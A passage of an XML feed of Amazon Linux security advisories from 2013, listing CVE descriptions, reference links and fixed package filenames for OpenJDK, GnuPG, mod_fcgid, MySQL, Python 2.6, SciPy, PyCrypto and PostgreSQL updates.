Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5783:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5782:
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine.
CVE-2013-5780:
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data.
CVE-2013-5778:
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory.
CVE-2013-5774:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5772:
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks.
CVE-2013-4002:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-3829:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829" title="" id="CVE-2013-3829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772" title="" id="CVE-2013-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774" title="" id="CVE-2013-5774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778" title="" id="CVE-2013-5778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780" title="" id="CVE-2013-5780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782" title="" id="CVE-2013-5782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783" title="" id="CVE-2013-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784" title="" id="CVE-2013-5784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790" title="" id="CVE-2013-5790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5800" title="" id="CVE-2013-5800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802" title="" id="CVE-2013-5802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803" title="" id="CVE-2013-5803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804" title="" id="CVE-2013-5804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809" title="" id="CVE-2013-5809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814" title="" id="CVE-2013-5814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817" title="" id="CVE-2013-5817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820" title="" id="CVE-2013-5820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823" title="" id="CVE-2013-5823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825" title="" id="CVE-2013-5825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829" title="" id="CVE-2013-5829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830" title="" id="CVE-2013-5830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5838" title="" id="CVE-2013-5838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840" title="" id="CVE-2013-5840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842" title="" id="CVE-2013-5842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849" title="" id="CVE-2013-5849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850" title="" id="CVE-2013-5850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5851" title="" id="CVE-2013-5851" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1451.html" title="" id="RHSA-2013:1451" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.2.32.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.45" release="2.4.3.2.32.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-236</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-236: medium priority package update for gnupg</title><issued date="2013-10-23 15:23:00" /><updated date="2014-09-16 21:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4402:
1015685:
CVE-2013-4402 GnuPG: infinite recursion in the compressed packet parser DoS
CVE-2013-4351:
GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bits cleared (no usage permitted) as if it has all bits set (all usage permitted), which might allow remote attackers to bypass intended cryptographic protection mechanisms by leveraging the subkey.
1010137:
CVE-2013-4351 gnupg: treats no-usage-permitted keys as all-usages-permitted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4351" title="" id="CVE-2013-4351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4402" title="" id="CVE-2013-4402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.15" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.15-1.21.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.15" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.15-1.21.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.15" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.15-1.21.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.15" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.15-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-237</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-237: medium priority package update for gnupg2</title><issued date="2013-10-23 15:24:00" /><updated date="2014-09-16 21:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4402:
1015685:
CVE-2013-4402 GnuPG: infinite recursion in the compressed packet parser DoS
CVE-2013-4351:
GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bits cleared (no usage permitted) as if it has all bits set (all usage permitted), which might allow remote attackers to bypass intended cryptographic protection mechanisms by leveraging the subkey.
1010137:
CVE-2013-4351 gnupg: treats no-usage-permitted keys as all-usages-permitted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4351" title="" id="CVE-2013-4351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4402" title="" id="CVE-2013-4402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.22" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.22-1.24.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.22-1.24.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.22-1.24.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.22" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.22-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-238</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-238: important priority package update for mod_fcgid</title><issued date="2013-10-23 15:26:00" /><updated date="2014-09-16 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4365:
1017039:
CVE-2013-4365 mod_fcgid: heap overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4365" title="" id="CVE-2013-4365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_fcgid" version="2.3.9" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_fcgid-2.3.9-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_fcgid-debuginfo" version="2.3.9" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_fcgid-debuginfo-2.3.9-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_fcgid-debuginfo" version="2.3.9" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_fcgid-debuginfo-2.3.9-1.6.amzn1.i686.rpm</filename></package><package name="mod_fcgid" version="2.3.9" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_fcgid-2.3.9-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-239</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-239: important priority package update for mod24_fcgid</title><issued date="2013-10-23 15:26:00" /><updated date="2014-09-16 21:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4365:
1017039:
CVE-2013-4365 mod_fcgid: heap overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4365" title="" id="CVE-2013-4365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_fcgid" version="2.3.9" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_fcgid-2.3.9-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_fcgid-debuginfo" version="2.3.9" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_fcgid-debuginfo-2.3.9-1.7.amzn1.x86_64.rpm</filename></package><package name="mod24_fcgid-debuginfo" version="2.3.9" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_fcgid-debuginfo-2.3.9-1.7.amzn1.i686.rpm</filename></package><package name="mod24_fcgid" version="2.3.9" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_fcgid-2.3.9-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-240</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-240: low priority package update for mysql51</title><issued date="2013-11-03 12:08:00" /><updated date="2014-09-16 21:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3839:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1019978:
CVE-2013-3839 mysql: unspecified DoS related to Optimizer (CPU October 2013)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3839" title="" id="CVE-2013-3839" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-common" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.72" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.72-1.64.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.72-1.64.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.72" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.72-1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-241</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-241: medium priority package update for python26</title><issued date="2013-11-03 12:09:00" /><updated date="2015-06-22 10:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4238:
The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
A flaw was found in the way the Python SSL module handled X.509 certificate fields that contain a NULL byte. An attacker could potentially exploit this flaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that to exploit this issue, an attacker would need to obtain a carefully crafted certificate signed by an authority that the client trusts.
996381:
CVE-2013-4238 python: hostname check bypassing vulnerability in SSL module
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238" title="" id="CVE-2013-4238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-tools" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-1.40.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-1.40.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-242</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-242: medium priority package update for scipy</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4251:
916690:
CVE-2013-4251 scipy: weave /tmp and current directory issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4251" title="" id="CVE-2013-4251" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="scipy-debuginfo" version="0.12.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/scipy-debuginfo-0.12.1-1.7.amzn1.x86_64.rpm</filename></package><package name="scipy" version="0.12.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/scipy-0.12.1-1.7.amzn1.x86_64.rpm</filename></package><package name="scipy" version="0.12.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/scipy-0.12.1-1.7.amzn1.i686.rpm</filename></package><package name="scipy-debuginfo" version="0.12.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/scipy-debuginfo-0.12.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-243</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-243: low priority package update for python-crypto</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1445:
The Crypto.Random.atfork function in PyCrypto before 2.6.1 does not properly reseed the pseudo-random number generator (PRNG) before allowing a child process to access it, which makes it easier for context-dependent attackers to obtain sensitive information by leveraging a race condition in which a child process is created and accesses the PRNG within the same rate-limit period as another process.
1020814:
CVE-2013-1445 python-crypto: PRNG not correctly reseeded in some situations
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1445" title="" id="CVE-2013-1445" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-crypto-debuginfo" version="2.6.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.7.amzn1.x86_64.rpm</filename></package><package name="python-crypto" version="2.6.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-2.6.1-1.7.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.7.amzn1.i686.rpm</filename></package><package name="python-crypto" version="2.6.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-2.6.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-244</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-244: medium priority package update for postgresql8</title><issued date="2013-11-03 12:09:00" /><updated date="2014-09-16 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1900:
A flaw was found in the way the pgcrypto contrib module of PostgreSQL (re)initialized its internal random number generator. This could lead to random numbers with less bits of entropy being used by certain pgcrypto functions, possibly allowing an attacker to conduct other attacks.
CVE-2013-0255:
An array index error, leading to a heap-based out-of-bounds buffer read flaw, was found in the way PostgreSQL performed certain error processing using enumeration types. An unprivileged database user could issue a specially crafted SQL query that, when processed by the server component of the PostgreSQL service, would lead to a denial of service (daemon crash) or disclosure of certain portions of server memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0255" title="" id="CVE-2013-0255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1900" title="" id="CVE-2013-1900" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1475.html" title="" id="RHSA-2013:1475" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-plpython" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.18" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.18-1.39.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-server" 